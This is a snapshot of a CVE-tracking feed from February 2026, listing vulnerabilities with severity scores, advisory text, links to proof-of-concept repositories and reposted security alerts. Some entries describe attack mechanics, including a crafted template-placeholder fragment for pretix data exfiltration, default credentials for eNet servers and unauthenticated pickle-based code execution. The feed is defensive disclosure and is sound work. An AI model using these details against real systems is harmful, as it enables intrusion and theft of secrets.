## Updated at UTC 2026-02-17T15:11:02.024808

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-1731 9.8 61.03% 2 3 template 2026-02-17T13:40:10.320000 BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote
CVE-2026-2247 0 0.14% 2 0 2026-02-17T12:16:15.443000 SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat
CVE-2025-7631 8.6 0.03% 2 0 2026-02-17T12:16:15.090000 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-25903 0 0.03% 2 0 2026-02-17T11:16:05.500000 Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur
CVE-2026-0829 0 0.02% 2 0 2026-02-17T07:16:31.883000 The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti
CVE-2026-2592 7.7 0.07% 4 1 2026-02-17T05:16:17.430000 The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro
CVE-2026-26220 0 0.55% 2 0 2026-02-17T03:16:01.893000 LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio
CVE-2025-12062 8.8 0.06% 2 0 2026-02-17T00:30:19 The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory &
CVE-2026-2564 8.1 0.04% 2 1 2026-02-16T17:18:09.150000 A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T
CVE-2026-1333 7.8 0.01% 2 0 2026-02-16T15:32:54 A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr
CVE-2026-1046 7.6 0.03% 4 0 2026-02-16T15:32:54 Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links
CVE-2026-1334 7.8 0.01% 2 0 2026-02-16T14:16:18.160000 An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in
CVE-2026-2451 None 0.05% 2 0 2026-02-16T12:32:02 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-2452 0 0.05% 2 0 2026-02-16T11:15:56.420000 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-26369 9.8 0.04% 4 0 2026-02-15T18:30:25 eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi
CVE-2026-26366 9.8 0.07% 4 0 2026-02-15T18:30:24 eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user
CVE-2025-32062 8.8 0.02% 6 0 2026-02-15T12:30:34 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2025-32058 9.4 0.01% 4 0 2026-02-15T12:30:34 The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communica
CVE-2025-32061 8.8 0.02% 2 0 2026-02-15T12:30:34 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2025-32059 8.8 0.02% 2 0 2026-02-15T12:30:25 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2026-1750 8.8 0.03% 2 0 2026-02-15T06:31:38 The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerab
CVE-2026-1490 9.8 0.08% 4 1 2026-02-15T04:15:53.783000 The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu
CVE-2026-2441 8.8 0.03% 5 1 2026-02-13T21:43:11.137000 Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a
CVE-2025-69770 10.0 0.09% 1 0 2026-02-13T21:43:11.137000 A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPorta
CVE-2026-1358 9.8 0.13% 2 0 2026-02-13T14:23:48.007000 Airleader Master versions 6.381 and prior allow for file uploads without restri
CVE-2024-43468 9.8 87.46% 2 3 2026-02-13T14:04:05.243000 Microsoft Configuration Manager Remote Code Execution Vulnerability
CVE-2026-22903 9.8 0.57% 1 0 2026-02-09T16:08:35.290000 An unauthenticated remote attacker can send a crafted HTTP request containing an
CVE-2026-1868 9.9 0.03% 1 0 2026-02-09T16:08:35.290000 GitLab has remediated a vulnerability in the Duo Workflow Service component of G
CVE-2025-64155 9.8 0.04% 2 4 2026-01-20T16:16:06.200000 An improper neutralization of special elements used in an os command ('os comman
CVE-2026-20965 7.5 0.03% 2 0 2026-01-16T16:23:11.237000 Improper verification of cryptographic signature in Windows Admin Center allows
CVE-2025-59922 7.2 0.05% 2 0 2026-01-14T21:38:33.547000 An improper neutralization of special elements used in an SQL command ('SQL Inje
CVE-2025-6264 5.5 0.06% 2 1 2025-10-23T01:00:00.913000 Velociraptor allows collection of VQL queries packaged into Artifacts from endpo
CVE-2026-02447 0 0.00% 1 0 N/A

CVE-2026-1731
(9.8 CRITICAL)

EPSS: 61.03%

updated 2026-02-17T13:40:10.320000

2 posts

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

Nuclei template

3 repos

https://github.com/cybrdude/cve-2026-1731-scanner

https://github.com/bytehazard/CVE-2026-1731

https://github.com/win3zz/CVE-2026-1731

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2026-2247
(0 None)

EPSS: 0.14%

updated 2026-02-17T12:16:15.443000

2 posts

SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application. In the URL of the generated PDF, the session token used does not expire, so it remains vali

offseq at 2026-02-17T13:00:36.021Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T13:00:36.000Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20 #OffSeq #SQLi #InfoSec #EduSec

##

CVE-2025-7631
(8.6 HIGH)

EPSS: 0.03%

updated 2026-02-17T12:16:15.090000

2 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.This issue affects Tumeva News Software: through 17022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-17T12:44:18.000Z ##

🟠 CVE-2025-7631 - High (8.6)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T12:44:18.000Z ##

🟠 CVE-2025-7631 - High (8.6)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25903
(0 None)

EPSS: 0.03%

updated 2026-02-17T11:16:05.500000

2 posts

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a co

offseq at 2026-02-17T11:30:45.075Z ##

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T11:30:45.000Z ##

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20 #OffSeq #NiFi #infosec #CVE202625903

##

CVE-2026-0829
(0 None)

EPSS: 0.02%

updated 2026-02-17T07:16:31.883000

2 posts

The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.

offseq at 2026-02-17T07:30:36.545Z ##

🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T07:30:36.000Z ##

🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Vuln #BlueTeam

##

CVE-2026-2592
(7.7 HIGH)

EPSS: 0.07%

updated 2026-02-17T05:16:17.430000

4 posts

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' failing to validate that the authority token provided in the callback URL belongs to the specific order being marked as paid. This makes it possible for unau

1 repos

https://github.com/drkim-dev/CVE-2026-25924

offseq at 2026-02-17T06:00:29.602Z ##

🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T05:16:30.000Z ##

🟠 CVE-2026-2592 - High (7.7)

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T06:00:29.000Z ##

🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: radar.offseq.com/threat/cve-20 #OffSeq #WooCommerce #WordPress

##

thehackerwire@mastodon.social at 2026-02-17T05:16:30.000Z ##

🟠 CVE-2026-2592 - High (7.7)

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26220
(0 None)

EPSS: 0.55%

updated 2026-02-17T03:16:01.893000

2 posts

LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code exec

offseq at 2026-02-17T08:30:38.130Z ##

⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T08:30:38.000Z ##

⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! radar.offseq.com/threat/cve-20 #OffSeq #infosec #CVE202626220 #rce

##

CVE-2025-12062
(8.8 HIGH)

EPSS: 0.06%

updated 2026-02-17T00:30:19

2 posts

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the executio

thehackerwire@mastodon.social at 2026-02-17T00:19:03.000Z ##

🟠 CVE-2025-12062 - High (8.8)

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T00:19:03.000Z ##

🟠 CVE-2025-12062 - High (8.8)

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2564
(8.1 HIGH)

EPSS: 0.04%

updated 2026-02-16T17:18:09.150000

2 posts

A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. Affected by this vulnerability is an unknown functionality of the file /OutsideCmd. The manipulation results in weak password recovery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. It is recommended to upgrade the affected component

1 repos

https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

offseq at 2026-02-17T10:00:29.808Z ##

🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T10:00:29.000Z ##

🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262564 #IoTSecurity

##

CVE-2026-1333
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-16T15:32:54

2 posts

A Use of Uninitialized Variable vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq at 2026-02-17T01:30:29.732Z ##

CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T01:30:29.000Z ##

CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! radar.offseq.com/threat/cve-20 #OffSeq #vuln #SOLIDWORKS #infosec

##

CVE-2026-1046
(7.6 HIGH)

EPSS: 0.03%

updated 2026-02-16T15:32:54

4 posts

Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost Advisory ID: MMSA-2026-00577

thehackerwire@mastodon.social at 2026-02-16T22:57:48.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:56:50.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:48.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:56:50.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1334
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-16T14:16:18.160000

2 posts

An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq at 2026-02-17T00:00:45.500Z ##

⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T00:00:45.000Z ##

⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #SOLIDWORKS #Infosec

##

CVE-2026-2451(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-16T12:32:02

2 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq at 2026-02-17T04:30:30.195Z ##

⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T04:30:30.000Z ##

⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #pretix #InfoSec

##

CVE-2026-2452
(0 None)

EPSS: 0.05%

updated 2026-02-16T11:15:56.420000

2 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq at 2026-02-17T03:00:32.616Z ##

🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T03:00:32.000Z ##

🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: radar.offseq.com/threat/cve-20 #OffSeq #Vuln #pretix #Infosec

##

CVE-2026-26369
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-15T18:30:25

4 posts

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabiliti

thehackerwire@mastodon.social at 2026-02-16T22:57:57.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:00.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:57.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:00.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26366
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-02-15T18:30:24

4 posts

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default credentials to gain administrative access to sensitive smart home configuration and control functions.

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:06.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:06.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32062
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T12:30:34

6 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:58:05.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:16.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:58:05.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:16.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32058
(9.4 CRITICAL)

EPSS: 0.01%

updated 2026-02-15T12:30:34

4 posts

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the V850 side which allows an attacker with code execution on the infotainment main SoC to perform code execution on the RH850 module and subsequently send a

thehackerwire@mastodon.social at 2026-02-16T22:57:17.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:25.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:17.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:25.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32061
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T12:30:34

2 posts

